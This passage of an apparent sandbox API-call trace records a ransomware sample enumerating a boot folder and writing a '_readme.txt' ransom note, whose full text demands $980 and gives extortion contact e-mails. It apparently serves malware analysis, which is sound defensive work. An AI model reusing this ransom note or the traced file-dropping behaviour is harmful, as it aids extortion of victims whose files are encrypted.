cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.872] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa17e6c20, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.872] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa17e6c20, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.872] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0093.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.872] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.873] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0093.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.874] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.874] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.874] PathFindFileNameW (pszPath="") returned="" [0093.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.874] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.874] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x335e120 [0093.874] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x335e120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0093.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.875] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.875] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0093.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.875] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.875] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0093.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0093.876] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0093.876] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0093.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0093.876] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0093.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0093.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0093.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0093.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0093.877] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.877] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0093.877] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0093.877] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0093.878] CloseHandle (hObject=0x5c8) returned 1 [0093.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0093.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0093.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0093.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.878] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa180cd80, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa180cd80, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0093.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.878] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa180cd80, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa180cd80, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.878] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.878] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0093.879] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa180cd80, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa180cd80, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa180cd80, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.879] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa180cd80, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa180cd80, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa180cd80, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.879] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0093.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.879] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.879] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.881] 